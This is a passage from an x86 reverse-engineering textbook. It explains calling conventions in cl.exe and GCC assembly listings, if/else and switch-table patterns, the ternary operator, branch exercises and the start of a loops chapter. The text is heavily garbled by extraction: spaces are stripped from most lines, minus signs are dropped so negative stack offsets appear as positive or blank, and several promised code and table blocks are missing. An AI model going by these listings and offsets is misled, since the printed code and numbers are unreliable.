CALL,andonewithSTDCALLcallingconventions. On
thecommandline,thereareseveralswitchesthatyoucan
usetoforcethecompilertochangethedefault:
/Gd: ThedefaultcallingconventionisCDECL
/Gr: ThedefaultcallingconventionisFASTCALL
/Gz: ThedefaultcallingconventionisSTDCALL
Usingthesecommandlineoptions,herearethelistings:
CDECL
intMyFunction(intx,inty){return(x*2)+(y*3);}
becomes:
PUBLIC _MyFunction _TEXT SEGMENT _x$ = 8
; size = 4 _y$ = 12 ; size = 4 _MyFunction PROC
NEAR ; Line 4 push ebp mov ebp, esp ; Line 5 mov
eax, _y$[ebp] imul eax, 3 mov ecx, _x$[ebp] lea eax,
[eax+ecx*2];Line6popebpret0_MyFunctionENDP
_TEXTENDSEND
Onentryofafunction, ESPpointstothereturnaddress
pushed on the stack by the call instruction (that is, pre-
viouscontentsofEIP).Anyargumentinstackofhigher
addressthanentryESPispushedbycallerbeforethecall
is made; in this example, the first argument is at offset
+4 from ESP (EIP is 4 bytes wide), plus 4 more bytes
oncetheEBPispushedonthestack. Thus,atline5,ESP
pointstothesavedframepointerEBP,andargumentsare
locatedataddressesESP+8(x)andESP+12(y).
ForCDECL,callerpushesargumentsintostackinaright
to leftorder. Becauseret0 is used, itmustbe thecaller
whocleansupthestack.
Asapointofinterest,noticehow leaisusedinthisfunc-
tion to simultaneously perform the multiplication (ecx *
2), and the addition of that quantity to eax. Unintuitive
instructionslikethiswillbeexploredfurtherinthechap-
teronunintuitiveinstructions .
FASTCALL
intMyFunction(intx,inty){return(x*2)+(y*3);}
becomes:
PUBLIC @MyFunction@8 _TEXT SEGMENT _y$
= 8 ; size = 4 _x$ =  4 ; size = 4 @MyFunction@8
PROC NEAR ; _x$ = ecx ; _y$ = edx ; Line 4 push
ebp mov ebp, esp sub esp, 8 mov _y$[ebp], edx mov
_x$[ebp], ecx ; Line 5 mov eax, _y$[ebp] imul eax, 3
3.5. CALLING CONVENTION EXAMPLES 43
mov ecx, _x$[ebp] lea eax, [eax+ecx*2] ; Line 6 mov
esp,ebppopebpret0@MyFunction@8ENDP_TEXT
ENDSEND
This function was compiled with optimizations turned
off. Here we see arguments are first saved in stack then
fetched from stack, rather than be used directly. This is
becausethecompilerwantsaconsistentwaytouseallar-
gumentsviastackaccess,notonlyonecompilerdoeslike
that.
There is no argument is accessed with positive offset to
entry SP, it seems caller doesn’t pushed in them, thus it
canuseret0. Let’sdofurtherinvestigation:
intFastTest(intx,inty,intz,inta,intb,intc){returnx
*y*z*a*b*c;}
andthecorrespondinglisting:
PUBLIC @FastTest@24 _TEXT SEGMENT _y$ =
 8 ; size = 4 _x$ =  4 ; size = 4 _z$ = 8 ; size =
4 _a$ = 12 ; size = 4 _b$ = 16 ; size = 4 _c$ = 20 ;
size = 4 @FastTest@24 PROC NEAR ; _x$ = ecx ;
_y$ = edx ; Line 2 push ebp mov ebp, esp sub esp, 8
mov _y$[ebp], edx mov _x$[ebp], ecx ; Line 3 mov
eax, _x$[ebp] imul eax, DWORD PTR _y$[ebp] imul
eax, DWORD PTR _z$[ebp] imul eax, DWORD PTR
_a$[ebp] imul eax, DWORD PTR _b$[ebp] imul eax,
DWORD PTR _c$[ebp] ; Line 4 mov esp, ebp pop ebp
ret16;00000010H
Now we have 6 arguments, four are pushed in by caller
fromrighttoleft,andlasttwoarepassedagainincx/dx,
andprocessedthesamewayaspreviousexample. Stack
cleanup is done by ret 16, which corresponding to 4 ar-
gumentspushedbeforecallexecuted.
For FASTCALL, compiler will try to pass arguments in
registers,ifnotenoughcallerwillpushedthemintostack
stillinanorderfromrighttoleft. Stackcleanupisdone
bycallee. It iscalledFASTCALLbecauseifarguments
canbepassedinregisters(for64bitCPUthemaximum
numberis6),nostackpush/cleanupisneeded.
The name-decoration scheme of the function: @My-
Function@n,herenisstacksizeneededforallarguments.
STDCALL
intMyFunction(intx,inty){return(x*2)+(y*3);}
becomes:
PUBLIC _MyFunction@8 _TEXT SEGMENT _x$ =
8 ; size= 4 _y$ = 12 ; size= 4 _MyFunction@8PROC
NEAR ; Line 4 push ebp mov ebp, esp ; Line 5 mov
eax, _y$[ebp] imul eax, 3 mov ecx, _x$[ebp] lea eax,
[eax+ecx*2] ; Line 6 pop ebp ret 8 _MyFunction@8ENDP_TEXTENDSEND
The STDCALL listing has only one difference than the
CDECL listing that it uses “ret 8” for self clean up of
stack. Letsdoanexamplewithmoreparameters:
intSTDCALLTest(intx, inty, intz, inta, intb, intc){
returnx*y*z*a*b*c;}
Let’stakealookathowthisfunctiongetstranslatedinto
assemblybycl.exe:
PUBLIC _STDCALLTest@24 _TEXT SEGMENT
_x$ = 8 ; size = 4 _y$ = 12 ; size = 4 _z$ = 16 ; size
= 4 _a$ = 20 ; size = 4 _b$ = 24 ; size = 4 _c$ = 28
; size = 4 _STDCALLTest@24 PROC NEAR ; Line
2 push ebp mov ebp, esp ; Line 3 mov eax, _x$[ebp]
imul eax, DWORD PTR _y$[ebp] imul eax, DWORD
PTR _z$[ebp] imul eax, DWORD PTR _a$[ebp] imul
eax, DWORD PTR _b$[ebp] imul eax, DWORD
PTR _c$[ebp] ; Line 4 pop ebp ret 24 ; 00000018H
_STDCALLTest@24ENDP_TEXTENDSEND
YestheonlydifferencebetweenSTDCALLandCDECL
isthattheformerdoesstackcleanupincallee, thelater
incaller. ThissavesalittlebitinX86duetoits“retn”.
3.5.2 GNUCCompiler
We will be using 2 example C functions to demonstrate
howGCCimplementscallingconventions:
intMyFunction1(intx,inty){return(x*2)+(y*3);}
and
int MyFunction2(int x, int y, int z, int a, int b, int c) {
returnx*y*(z+1)*(a+2)*(b+3)*(c+4);}
GCCdoesnothavecommandlineargumentstoforcethe
default calling convention to change from CDECL (for
C), so they will be manually defined in the text with the
directives: __cdecl,__fastcall,and__stdcall.
CDECL
The first function (MyFunction1) provides the following
assemblylisting:
_MyFunction1: pushl %ebp movl %esp, %ebp movl
8(%ebp),%eaxleal(%eax,%eax),%ecxmovl12(%ebp),
%edx movl %edx, %eax addl %eax, %eax addl %edx,
%eaxleal(%eax,%ecx),%eaxpopl%ebpret
Firstofall,wecanseethename-decorationisthesameas
incl.exe. Wecanalsoseethattheretinstructiondoesn't
haveanargument,sothecallingfunctioniscleaningthe
44 CHAPTER 3. CODE PATTERNS
stack. However, since GCC doesn't provide us with the
variable names in the listing, we have to deduce which
parametersarewhich. Afterthestackframeissetup,the
firstinstructionofthefunctionis“movl8(%ebp),%eax”.
One we remember (or learn for the first time) that GAS
instructionshavethegeneralform:
instructionsrc,dest
We realize that the value at offset +8 from ebp (the last
parameter pushed on the stack) is moved into eax. The
lealinstructionisalittlemoredifficulttodecipher,espe-
ciallyifwedon'thaveanyexperiencewithGASinstruc-
tions. The form “leal(reg1,reg2), dest” adds the values
in the parenthesis together, and stores the value in dest.
TranslatedintoIntelsyntax,wegettheinstruction:
leaecx,[eax+eax]
Which is clearly the same as a multiplication by 2. The
first value accessed must then have been the last value
passed, which would seem to indicate that values are
passed right-to-left here. To prove this, we will look at
thenextsectionofthelisting:
movl 12(%ebp), %edx movl %edx, %eax addl %eax,
%eaxaddl%edx,%eaxleal(%eax,%ecx),%eax
thevalueatoffset+12fromebpismovedintoedx. edx
isthenmovedintoeax. eaxisthenaddedtoitselt(eax*
2),andthenisaddedbacktoedx(edx+eax). remember
though that eax = 2 * edx, so the result is edx * 3. This
then is clearly the y parameter, which is furthest on the
stack,andwasthereforethefirstpushed. CDECLthenon
GCCisimplementedbypassingargumentsonthestack
inright-to-leftorder,sameascl.exe.
FASTCALL
.globl @MyFunction1@8 .def @MyFunction1@8; .scl
2; .type 32; .endef @MyFunction1@8: pushl %ebp
movl%esp,%ebpsubl$8,%espmovl%ecx,  4(%ebp)
movl %edx,  8(%ebp) movl  4(%ebp), %eax leal
(%eax,%eax), %ecx movl  8(%ebp), %edx movl
%edx, %eax addl %eax, %eax addl %edx, %eax leal
(%eax,%ecx),%eaxleaveret
Notice first that the same name decoration is used as in
cl.exe. Theastuteobserverwillalreadyhaverealizedthat
GCCusesthesametrickascl.exe,ofmovingthefastcall
arguments from their registers (ecx and edx again) onto
a negative offset on the stack. Again, optimizations are
turnedoff. ecxismovedintothefirstposition(  4)and
edx is moved into the second position (  8). Like the
CDECLexampleabove,thevalueat  4isdoubled,and
thevalueat  8istripled. Therefore,  4(ecx)isx, and
 8 (edx) is y. It would seem from this listing then that
values are passed left-to-right, although we will need to
takealookatthelarger,MyFunction2example:.globl @MyFunction2@24 .def @MyFunction2@24;
.scl2;.type32;.endef@MyFunction2@24: pushl%ebp
movl%esp,%ebpsubl$8,%espmovl%ecx,  4(%ebp)
movl %edx,  8(%ebp) movl  4(%ebp), %eax imull
 8(%ebp),%eaxmovl8(%ebp),%edxincl%edximull
%edx,%eaxmovl12(%ebp),%edxaddl$2,%edximull
%edx,%eaxmovl16(%ebp),%edxaddl$3,%edximull
%edx,%eaxmovl20(%ebp),%edxaddl$4,%edximull
%edx,%eaxleaveret$16
ByfollowingthefactthatinMyFunction2,successivepa-
rameters are added to increasing constants, we can de-
duce the positions of each parameter.  4 is still x, and
 8 is still y. +8 gets incremented by 1 (z), +12 gets in-
creased by 2 (a). +16 gets increased by 3 (b), and +20
getsincreasedby4(c). Let’slistthesevaluesthen:
z = [ebp + 8] a = [ebp + 12] b = [ebp + 16] c = [ebp +
20]
cisthefurthestdown,andthereforewasthefirstpushed.
z is the highest to the top, and was therefore the last
pushed. Arguments are therefore pushed in right-to-left
order,justlikecl.exe.
STDCALL
Let’scomparethentheimplementationofMyFunction1
inGCC:
.globl _MyFunction1@8 .def _MyFunction1@8; .scl 2;
.type 32; .endef _MyFunction1@8: pushl %ebp movl
%esp, %ebp movl 8(%ebp), %eax leal (%eax,%eax),
%ecx movl 12(%ebp), %edx movl %edx, %eax addl
%eax, %eax addl %edx, %eax leal (%eax,%ecx), %eax
popl%ebpret$8
The name decoration is the same as in cl.exe, so STD-
CALLfunctions(andCDECLandFASTCALLforthat
matter)canbeassembledwitheithercompiler,andlinked
with either linker, it seems. The stack frame is set up,
then the value at [ebp + 8] is doubled. After that, the
valueat[ebp+12]istripled. Therefore,+8isx,and+12
isy. Again,thesevaluesarepushedinright-to-leftorder.
This function also cleans its own stack with the “ret 8”
instruction.
Lookingatabiggerexample:
.globl _MyFunction2@24 .def _MyFunction2@24; .scl
2; .type 32; .endef _MyFunction2@24: pushl %ebp
movl%esp,%ebpmovl8(%ebp),%eaximull12(%ebp),
%eax movl 16(%ebp), %edx incl %edx imull %edx,
%eaxmovl20(%ebp),%edxaddl$2,%edximull%edx,
%eaxmovl24(%ebp),%edxaddl$3,%edximull%edx,
%eaxmovl28(%ebp),%edxaddl$4,%edximull%edx,
%eaxpopl%ebpret$24
Wecanseeherethatvaluesat+8and+12fromebpare
3.6. BRANCHES 45
stillxandy,respectively. Thevalueat+16isincremented
by1,thevalueat+20isincrementedby2,etcalltheway
tothevalueat+28. Wecanthereforecreatethefollowing
table:
x = [ebp + 8] y = [ebp + 12] z = [ebp + 16] a = [ebp +
20]b=[ebp+24]c=[ebp+28]
Withcbeingpushedfirst,andxbeingpushedlast. There-
fore,theseparametersarealsopushedinright-to-leftor-
der. Thisfunctionthenalsocleans24bytesoffthestack
withthe“ret24”instruction.
3.5.3 Example:CCallingConventions
Identify the calling convention of the following C func-
tion:
intMyFunction(inta,intb){returna+b;}
ThefunctioniswritteninC,andhasnootherspecifiers,
soitisCDECLbydefault.
3.5.4 Example: Named Assembly Func-
tion
Identifythecallingconventionofthefunction MyFunc-
tion:
:_MyFunction@12 push ebp mov ebp, esp ... pop ebp
ret12
The function includes the decorated name of an STD-
CALLfunction, andcleansupitsownstack. Itisthere-
foreanSTDCALLfunction.
3.5.5 Example:UnnamedAssemblyFunc-
tion
This code snippet is the entire body of an unnamed as-
sembly function. Identify the calling convention of this
function.
pushebpmovebp,espaddeax,edxpopebpret
Thefunctionsetsupastackframe,soweknowthecom-
pilerhasntdoneanything“funny”toit. Itaccessesregis-
terswhicharentinitializedyet,intheedxandeaxregis-
ters. ItisthereforeaFASTCALLfunction.
3.5.6 Example: Another Unnamed As-
semblyFunction
push ebp mov ebp, esp mov eax, [ebp + 8] pop ebp ret
16The function has a standard stack frame, and the retin-
struction has a parameter to clean its own stack. Also,
itaccessesaparameterfromthestack. Itisthereforean
STDCALLfunction.
3.5.7 Example:NameMangling
Whatcanwetellaboutthefollowingfunctioncall?
movecx,xpusheaxmoveax,ss:[ebp-4]pusheaxmov
al,ss:[ebp-3]call@__Load?$Container__XXXY_?Fcii
Two things should get our attention immediately. The
firstisthatbeforethefunctioncall,avalueisstoredinto
ecx. Also, the function name itself is heavily mangled.
ThisexamplemustusetheC++THISCALLconvention.
Inside the mangled name of the function, we can pick
outtwoenglishwords,“Load”and“Container”. Without
knowing the specifics of this name mangling scheme, it
is not possible to determine which word is the function
name,andwhichwordistheclassname.
Wecanpickouttwo32-bitvariablesbeingpassedtothe
function, and a single 8-bit variable. The first is located
ineax,thesecondisoriginallylocatedonthestackfrom
offset  4 fromebp, and the third is located at ebpoff-
set 3. InC++,thesewouldlikelycorrespondtotwo int
variables,andasingle charvariable. Noticeattheendof
themangledfunctionnamearethreelower-casecharac-
ters“cii”. Wecan'tknowforcertain,butitappearsthese
threeletterscorrespondtothethreeparameters(char,int,
int). Wedonotknowfromthiswhetherthefunctionre-
turnsavalueornot,sowewillassumethefunctionreturns
void.
Assuming that “Load” is the function name and “Con-
tainer” is the class name (it could just as easily be the
otherwayaround),hereisourfunctiondefinition:
classContainer{voidLoad(char,int,int);}
3.6 Branches
3.6.1 Branching
Computer science professors tell their students to avoid
jumps andgotoinstructions, to avoid the proverbial
“spaghetticode.”Unfortunately,assemblyonlyhasjump
instructionstocontrolprogramflow. Thischapterwillex-
plorethesubjectthatmanypeopleavoidliketheplague,
and will attempt to show how the spaghetti of assembly
canbetranslatedintothemorefamiliarcontrolstructures
ofhigh-levellanguage. Specifically,thischapterwillfo-
cusonIf-Then-Else andSwitchbranchinginstructions.
46 CHAPTER 3. CODE PATTERNS
3.6.2 If-Then
Let’sconsiderageneric ifstatementinpseudo-codefol-
lowedbyitsequivalentformusingjumps:
Whatdoesthiscodedo? InEnglish,thecodechecksthe
condition and performs a jump only if it is false. With
that in mind, let’s compare some actual C code and its
Assemblytranslation:
Note that when we translate to assembly, we need to
negatethe condition of the jump because--like we said
above--we only jump if the condition is false. To recre-
atethehigh-levelcode,simplynegatetheconditiononce
again.
Negatingacomparisonmaybetrickyifyou'renotpaying
attention. Herearethecorrectdualforms:
Andherearesomeexamples.
mov eax, $x //move x into eax cmp eax, $y //compare
eaxwithyjgend//jumpifgreaterthaninceaxmove$x,
eax//incrementxend: ...
IsproducedbytheseCstatements:
if(x<=y){x++;}
As you can see, x is incremented only if it is lessthan
orequalto y. Thus,ifitisgreaterthany, itwillnotbe
incremented as in the assembler code. Similarly, the C
code
if(x<y){x++;}
producesthisassemblercode:
mov eax, $x //move x into eax cmp eax, $y //compare
eaxwithyjgeend//jumpifgreaterthanorequaltoinc
eaxmove$x,eax//incrementxend: ...
X is incremented in the C code only if it is lessthany,
so the assembler code now jumps if it’s greater than or
equal to y. This kind of thing takes practice, so we will
trytoincludelotsofexamplesinthissection.
3.6.3 If-Then-Else
Letusnowlookatamorecomplicatedcase: the If-Then-
Elseinstruction.
Now, what happens here? Like before, the if statement
onlyjumpstotheelseclausewhentheconditionisfalse.
However, we must also install an unconditional jump at
theendofthe“then”clause,sowedon'tperformtheelse
clausedirectlyafterwards.
Now,hereisanexampleofarealCIf-Then-Else:
if(x==10){x=0;}else{x++;}Whichgetstranslatedintothefollowingassemblycode:
mov eax, $x cmp eax, 0x0A ;0x0A = 10 jne else mov
eax,0jmpendelse: inceaxend: mov$x,eax
As you can see, the addition of a single unconditional
jumpcanaddanentireextraoptiontoourconditional.
3.6.4 Switch-Case
Switch-Case structures can be very complicated when
viewed in assembly language, so we will examine a few
examples. First,keepinmindthatinC,thereareseveral
keywordsthatarecommonlyusedinaswitchstatement.
Hereisarecap:
SwitchThiskeywordteststheargument,andstartsthe
switchstructure
CaseThis creates a label that execution will switch to,
dependingonthevalueoftheargument.
BreakThis statement jumps to the end of the switch
block
DefaultThisisthelabelthatexecutionjumpstoifand
onlyifitdoesn'tmatchuptoanyotherconditions
Letssaywehaveageneralswitchstatement,butwithan
extralabelattheend,assuch:
switch(x){//bodyofswitchstatement}end_of_switch:
Now, every breakstatement will be immediately re-
placedwiththestatement
jmpend_of_switch
But what do the rest of the statements get changed to?
The case statements can each resolve to any number of
arbitrary integer values. How do we test for that? The
answeristhatweusea“SwitchTable”. Hereisasimple,
Cexample:
intmain(intargc,char**argv){//line10switch(argc){
case 1: MyFunction(1); break; case 2: MyFunction(2);
break; case 3: MyFunction(3); break; case 4: MyFunc-
tion(4);break;default: MyFunction(5);}return0;}
And when we compile this with cl.exe, we can generate
thefollowinglistingfile:
tv64=  4; size=4_argc$=8; size=4_argv$=12;
size = 4 _main PROC NEAR ; Line 10 push ebp mov
ebp, esp push ecx ; Line 11 mov eax, DWORD PTR
_argc$[ebp] mov DWORD PTR tv64[ebp], eax mov
ecx, DWORDPTRtv64[ebp]subecx, 1movDWORD
PTRtv64[ebp],ecxcmpDWORDPTRtv64[ebp],3ja
SHORT$L810movedx,DWORDPTRtv64[ebp]jmp
3.6. BRANCHES 47
DWORD PTR $L818[edx*4] $L806: ; Line 14 push
1 call _MyFunction add esp, 4 ; Line 15 jmp SHORT
$L803 $L807: ; Line 17 push 2 call _MyFunction
add esp, 4 ; Line 18 jmp SHORT $L803 $L808: ;
Line 19 push 3 call _MyFunction add esp, 4 ; Line
20 jmp SHORT $L803 $L809: ; Line 22 push 4 call
_MyFunction add esp, 4 ; Line 23 jmp SHORT $L803
$L810: ; Line 25 push 5 call _MyFunction add esp, 4
$L803: ; Line 27 xor eax, eax ; Line 28 mov esp, ebp
popebpret0$L818: DD$L806DD$L807DD$L808
DD$L809_mainENDP
Lets work our way through this. First, we see that line
10setsupourstandardstackframe,anditalsosavesecx.
Why does it save ecx? Scanning through the function,
we never see a corresponding “pop ecx” instruction, so
it seems that the value is never restored at all. In fact,
the compiler isn't saving ecx at all, but is instead simply
reserving space on the stack: it’s creating a local vari-
able. TheoriginalCcodedidn'thaveanylocalvariables,
however,soperhapsthecompilerjustneededsomeextra
scratch space to store intermediate values. Why doesn't
thecompilerexecutethemorefamiliar“subesp,4”com-
mandtocreatethelocalvariable? pushecxisjustafaster
instructionthatdoesthesamething. This“scratchspace”
is being referenced by a negative offset from ebp.tv64
was defined in the beginning of the listing as having the
value  4, so every call to “tv64[ebp]" is a call to this
scratchspace.
There are a few things that we need to notice about the
functioningeneral:
Label$L803istheend_of_switchlabel. Therefore,
every “jmp SHORT $L803” statement is a break.
ThisisverifiablebycomparingwiththeCcodeline-
by-line.
Label$L818containsalistofhard-codedmemory
addresses,whichherearelabelsinthecodesection!
Remember,labelsresolvetothememoryaddressof
the instruction. This must be an important part of
ourpuzzle.
Tosolvethispuzzle,wewilltakeanin-depthlookatline
11:
mov eax, DWORD PTR _argc$[ebp] mov DWORD
PTR tv64[ebp], eax mov ecx, DWORD PTR tv64[ebp]
sub ecx, 1 mov DWORD PTR tv64[ebp], ecx cmp
DWORD PTR tv64[ebp], 3 ja SHORT $L810 mov
edx, DWORD PTR tv64[ebp] jmp DWORD PTR
$L818[edx*4]
This sequence performs the following pseudo-C opera-
tion:
if(argc-1>=4){goto$L810;/*thedefault*/}label
*L818[]={$L806,$L807,$L808,$L809};/*defineatableofjumps,onepereachcase*///gotoL818[argc-
1];/*usetheaddressfromthetabletojumptothecorrect
case*/
Here’swhy...
TheSetup
mov eax, DWORD PTR _argc$[ebp] mov DWORD
PTR tv64[ebp], eax mov ecx, DWORD PTR tv64[ebp]
subecx,1movDWORDPTRtv64[ebp],ecx
Thevalueofargcismovedintoeax. Thevalueofeaxis
thenimmediatelymovedtothescratchspace. Thevalue
ofthescratchspaceisthenmovedintoecx. Soundslike
an awfully convoluted way to get the same value into so
manydifferentlocations,butremember: Iturnedoffthe
optimizations. The value of ecx is then decremented by
1. Whydidn'tthecompilerusea decinstructioninstead?
Perhapsthestatementisageneralstatement, thatinthis
case just happens to have an argument of 1. We don't
knowwhyexactly,allweknowisthis:
eax=“scratchpad”
ecx=eax-1
Finally, the last line moves the new, decremented value
ofecx back into the scratch pad . Veryinefficient.
TheCompareandJumps
cmpDWORDPTRtv64[ebp],3jaSHORT$L810
Thevalueofthescratchpadiscomparedwiththevalue
3,andifthe unsignedvalueisabove3(4ormore),exe-
cutionjumpstolabel$L810. HowdoIknowthevalueis
unsigned? I know because jais an unsigned conditional
jump. Let’slookbackattheoriginalCcodeswitch:
switch(argc) { case 1: MyFunction(1); break; case 2:
MyFunction(2); break; case 3: MyFunction(3); break;
case4: MyFunction(4);break;default: MyFunction(5);}
Remember,thescratchpadcontainsthevalue(argc-1),
which means that this condition is only triggered when
argc>4. Whathappenswhenargcisgreaterthan4? The
functiongoestothedefaultcondition. Now,let’slookat
thenexttwolines:
mov edx, DWORD PTR tv64[ebp] jmp DWORD PTR
$L818[edx*4]
edxgetsthevalueofthescratchpad(argc-1),andthen
there is a very weird jump that takes place: execution
jumps to a location pointed to by the value (edx * 4 +
$L818). Whatis$L818? Wewillexaminethatrightnow.
48 CHAPTER 3. CODE PATTERNS
TheSwitchTable
$L818: DD$L806DD$L807DD$L808DD$L809
$L818isapointer,inthecodesection,toalistofother
codesectionpointers. Thesepointersareall32bitvalues
(DD is a DWORD). Let’s look back at our jump state-
ment:
jmpDWORDPTR$L818[edx*4]
Inthisjump,$L818 isn't the offset, it’s the base ,edx*4is
the offset. As we said earlier, edx contains the value of
(argc- 1). If argc == 1, wejump to [$L818 + 0] which
is$L806. Ifargc==2, wejumpto[$L818+4], which
is$L807. Getthepicture? Aquicklookatlabels$L806,
$L807,$L808,and$L809showsusexactlywhatweex-
pect to see: the bodies of the casestatements from the
originalCcode, above. Eachoneofthecasestatements
calls the function “MyFunction”, then breaks, and then
jumpstotheendoftheswitchblock.
3.6.5 TernaryOperator?:
Again, the best way to learn is by doing. Therefore we
willgothroughaminiexampletoexplaintheternaryop-
erator. ConsiderthefollowingCcodeprogram:
intmain(intargc,char**argv){return(argc>1)?(5):(0);
}
cl.exeproducesthefollowingassemblylistingfile:
_argc$ = 8 ; size = 4 _argv$ = 12 ; size = 4
_main PROC NEAR ; File c:\documents and set-
tings\andrew\desktop\test2.c ; Line 2 push ebp mov
ebp, esp ; Line 3 xor eax, eax cmp DWORD PTR
_argc$[ebp], 1 setle al dec eax and eax, 5 ; Line 4 pop
ebpret0_mainENDP
Line2setsupastackframe,andline4isastandardexit
sequence. There are no local variables. It is clear that
Line3iswherewewanttolook.
The instruction “xor eax, eax” simply sets eax to 0.
For more information on that line, see the chapter on
unintuitive instructions . Thecmpinstruction tests the
condition of the ternary operator. The setlefunction is
oneofasetofx86functionsthatworkslikeaconditional
move: algetsthevalue1ifargc<=1. Isn'tthattheexact
oppositeofwhatwewanted? Inthiscase,itis. Let’slook
at what happens when argc = 0: algets the value 1. al
is decremented (al = 0), and then eax is logically anded
with5. 5&0=0. Whenargc==2(greaterthan1),the
setleinstructiondoesn'tdoanything,andeaxstilliszero.
eax is then decremented, which means that eax ==  1.
Whatis  1?
Inx86processors,negativenumbersarestoredin two’s-complement format. For instance, let’s look at the fol-
lowingCcode:
BYTEx;x=  1;
AttheendofthisCcode, xwillhavethevalue11111111:
allones!
Whenargcisgreaterthan1,setlesetsaltozero. Decre-
menting this value sets every bit in eax to a logical 1.
Now,whenweperformthelogical andfunctionweget:
...11111111&...00000101;101is5inbinary------------
...00000101
eaxgetsthevalue5. Inthiscase,it’saroundaboutmethod
ofdoingit,butasareverser,thisisthestuffyouneedto
worryabout.
For reference, here is the GCC assembly output of the
sameternaryoperatorfromabove:
_main: pushl %ebp movl %esp, %ebp subl $8, %esp
xorl %eax, %eax andl $  16, %esp call __alloca call
___mainxorl%edx,%edxcmpl$2,8(%ebp)setge%dl
leal(%edx,%edx,4),%eaxleaveret
Notice that GCC produces slightly different code than
cl.exe produces. However, the stack frame is set up the
sameway. NoticealsothatGCCdoesn'tgiveuslinenum-
bers,orotherhintsinthecode. Theternaryoperatorline
occursaftertheinstruction“call__main”. Let’shighlight
thatsectionhere:
xorl %edx, %edx cmpl $2, 8(%ebp) setge %dl leal
(%edx,%edx,4),%eax
Again,xorisusedtosetedxto0quickly. Argcistested
against2(insteadof1),anddlissetifargcis greater then
or equal. If dl gets set to 1, the lealinstruction directly
thereafterwillmovethevalueof5intoeax(becauselea
(edx,edx,4)meansedx+edx*4,i.e. edx*5).
3.7 BranchExamples
3.7.1 Example:NumberofParameters
What parameters does this function take? What calling
conventiondoesituse? Whatkindofvaluedoesitreturn?
WritetheentireCprototypeofthisfunction. Assumeall
valuesareunsignedvalues.
push ebp mov ebp, esp mov eax, 0 mov ecx, [ebp + 8]
cmp ecx, 0 jne _Label_1 inc eax jmp _Label_2 :_La-
bel_1deceax: _Label_2movecx,[ebp+12]cmpecx,0
jne_Label_3inceax: _Label_3movesp,ebppopebpret
3.8. LOOPS 49
This function accesses parameters on the stack at [ebp
+ 8] and [ebp + 12]. Both of these values are loaded
into ecx, and we can therefore assume they are 4-byte
values. Thisfunctiondoesn'tcleanitsownstack,andthe
valuesaren'tpassedinregisters,soweknowthefunction
isCDECL.Thereturnvalueineaxisa4-bytevalue,and
we are told to assume that all the values are unsigned.
Putting all this together, we can construct the function
prototype:
unsigned int CDECL MyFunction(unsigned int param1,
unsignedintparam2);
3.7.2 Example: Identify Branch Struc-
tures
How many separate branch structures are in this func-
tion? What types are they? Can you give more descrip-
tivenamesto_Label_1,_Label_2,and_Label_3,based
onthestructuresofthesebranches?
push ebp mov ebp, esp mov eax, 0 mov ecx, [ebp + 8]
cmp ecx, 0 jne _Label_1 inc eax jmp _Label_2 :_La-
bel_1deceax: _Label_2movecx,[ebp+12]cmpecx,0
jne_Label_3inceax: _Label_3movesp,ebppopebpret
How many separate branch structures are there in this
function? Stripping away the entry and exit sequences,
hereisthecodewehaveleft:
movecx,[ebp+8]cmpecx,0jne_Label_1inceaxjmp
_Label_2 :_Label_1 dec eax : _Label_2 mov ecx, [ebp
+12]cmpecx,0jne_Label_3inceax: _Label_3
Lookingthrough,wesee2 cmpstatements. Thefirstcmp
statement compares ecx to zero. If ecx is not zero, we
go to _Label_1, decrement eax, and then fall through to
_Label_2. If ecx is zero, we increment eax, and go to
directlyto _Label_2. Writingoutsome pseudocode, we
havethefollowingresultforthefirstsection:
if(ecx doesnt equal 0) goto _Label_1 eax++; goto _La-
bel_2:_Label_1eax--;:_Label_2
Since _Label_2 occurs at the end of this structure,
we can rename it to something more descriptive, like
“End_of_Branch_1”,or“Branch_1_End”. Thefirstcom-
parisontestsecxagainst0,andthenjumpsonnot-equal.
Wecanreversetheconditional,andsaythat_Label_1is
anelseblock:
if(ecx==0);ecxisparam1here{eax++;}else{eax--;}
So we can rename _Label_1 to something else descrip-
tive, such as “Else_1”. The rest of the code block, after
Branch_1_End(_Label_2)isasfollows:
mov ecx, [ebp + 12] cmp ecx, 0 jne _Label_3 inc eax :
_Label_3We can see immediately that _Label_3 is the end of
this branch structure, so we can immediately call it
“Branch_2_End”,orsomethingelse. Here,weareagain
comparingecxto0,andifitisnotequal,wejumptothe
endoftheblock. Ifitisequaltozero,however,weincre-
menteax,andthenfalloutthebottomofthebranch. We
canseethatthereisno elseblockinthisbranchstructure,
sowedon'tneedtoinvertthecondition. Wecanwritean
ifstatementdirectly:
if(ecx==0);ecxisparam2here{eax++;}
3.7.3 Example:ConvertToC
WritetheequivalentCcodeforthisfunction. Assumeall
parametersandreturnvaluesareunsignedvalues.
push ebp mov ebp, esp mov eax, 0 mov ecx, [ebp + 8]
cmpecx,0jne_Label_1inceaxjne_Label_2:_Label_1
dec eax : _Label_2 mov ecx, [ebp + 12] cmp ecx, 0
jne_Label_3inceax: _Label_3movesp,ebppopebpret
StartingwiththeCfunctionprototypefromanswer1,and
theconditionalblocksinanswer2,wecanputtogethera
pseudo-codefunction,withoutvariabledeclarations,ora
returnvalue:
unsigned int CDECL MyFunction(unsigned int param1,
unsignedintparam2){if(param1==0){eax++; }else
{eax--;}if(param2==0){eax++;}}
Now,wejustneedtocreateavariabletostorethevalue
fromeax,whichwewillcall“a”,andwewilldeclareasa
registertype:
unsigned int CDECL MyFunction(unsigned int param1,
unsigned int param2) { register unsigned int a = 0;
if(param1==0){a++;}else{a--;}if(param2==0){
a++;}returna;}
Granted,thisfunctionisn'taparticularlyusefulfunction,
butatleastweknowwhatitdoes.
3.8 Loops
3.8.1 Loops
To complete repetitive tasks, programmers often imple-
mentloops. Therearemanysortsofloops,buttheycan
all be boiled down to a few similar formats in assembly
code. This chapter will discuss loops, how to identify
50 CHAPTER 3. CODE PATTERNS
them,andhowto“decompile”thembackintohigh-level
representations.
3.8.2 Do-WhileLoops
It seems counterintuitive that this section will consider
Do-While loopsfirst,consideringthattheymightbethe
leastusedofallthevariationsinpractice. However,there
ismethodtoourmadness,soreadon.
ConsiderthefollowinggenericDo-Whileloop:
Whatdoesthisloopdo? Theloopbodysimplyexecutes,
theconditionistestedattheendoftheloop,andtheloop
jumpsbacktothebeginningoftheloopiftheconditionis
satisfied. Unlike ifstatements, Do-While conditions are
notreversed.
LetusnowtakealookatthefollowingCcode:
do{x++;}while(x!=10);
Whichcanbetranslatedintoassemblylanguageassuch:
moveax,$xbeginning: inceaxcmpeax,0x0A;0x0A=
10jnebeginningmov$x,eax
3.8.3 WhileLoops
Whileloopslookalmostassimpleasa Do-While loop,
butinrealitytheyaren'tassimpleatall. Let’sexaminea
